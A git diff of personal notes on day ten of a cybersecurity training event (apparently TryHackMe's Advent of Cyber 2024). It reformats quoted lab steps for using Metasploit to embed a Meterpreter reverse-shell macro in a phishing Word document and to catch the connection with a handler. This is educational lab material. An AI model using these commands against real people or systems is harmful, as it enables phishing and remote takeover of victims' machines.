Day ten with markdown

--- a/AOC2024.md
+++ b/AOC2024.md
@@ -163,24 +163,24 @@ Whoah! Tenth day already? Today we had to phish for some tasty reverse shell. So
 
 >You will use the Metasploit Framework to create the document with the malicious macro. This requires the following commands:
 >
->    Open a new terminal window and run msfconsole to start the Metasploit Framework
->    set payload windows/meterpreter/reverse_tcp specifies the payload to use; in this case, it connects to the specified host and creates a reverse shell
->    use exploit/multi/fileformat/office_word_macro specifies the exploit you want to use. Technically speaking, this is not an exploit; it is a module to create a document with a macro
->    set LHOST CONNECTION_IP specifies the IP address of the attacker’s system, CONNECTION_IP in this case is the IP of the AttackBox
->    set LPORT 8888 specifies the port number you are going to listen on for incoming connections on the AttackBox
->    show options shows the configuration options to ensure that everything has been set properly, i.e., the IP address and port number in this example
->    exploit generates a macro and embeds it in a document
->    exit to quit and return to the terminal
+> *   Open a new terminal window and run `msfconsole` to start the Metasploit Framework
+> *   `set payload windows/meterpreter/reverse_tcp` specifies the payload to use; in this case, it connects to the specified host and creates a reverse shell
+> *   `use exploit/multi/fileformat/office_word_macro` specifies the exploit you want to use. Technically speaking, this is not an exploit; it is a module to create a document with a macro
+> *   `set LHOST CONNECTION_IP` specifies the IP address of the attacker’s system, CONNECTION_IP in this case is the IP of the AttackBox
+> *   `set LPORT 8888` specifies the port number you are going to listen on for incoming connections on the AttackBox
+> *   `show options` shows the configuration options to ensure that everything has been set properly, i.e., the IP address and port number in this example
+> *   `exploit` generates a macro and embeds it in a document
+> *   `exit` to quit and return to the terminal
 
 >We again will use the Metasploit Framework, but this time to listen for incoming connections when a target users opens our phishing Word document. This requires the following commands:
 >
->    Open a new terminal window and run msfconsole to start the Metasploit Framework
->    use multi/handler to handle incoming connections
->    set payload windows/meterpreter/reverse_tcp to ensure that our payload works with the payload used when creating the malicious macro
->    set LHOST CONNECTION_IP specifies the IP address of the attacker’s system and should be the same as the one used when creating the document
->    set LPORT 8888 specifies the port number you are going to listen on and should be the same as the one used when creating the document
->    show options to confirm the values of your options
->    exploit starts listening for incoming connections to establish a reverse shell
+> *   Open a new terminal window and run `msfconsole` to start the Metasploit Framework
+> *   `use multi/handler` to handle incoming connections
+> *   `set payload windows/meterpreter/reverse_tcp` to ensure that our payload works with the payload used when creating the malicious macro
+> *   `set LHOST CONNECTION_IP` specifies the IP address of the attacker’s system and should be the same as the one used when creating the document
+> *   `set LPORT 8888` specifies the port number you are going to listen on and should be the same as the one used when creating the document
+> *   `show options` to confirm the values of your options
+> *   `exploit` starts listening for incoming connections to establish a reverse shell
 
 ### DAY ELEVEN ###
 
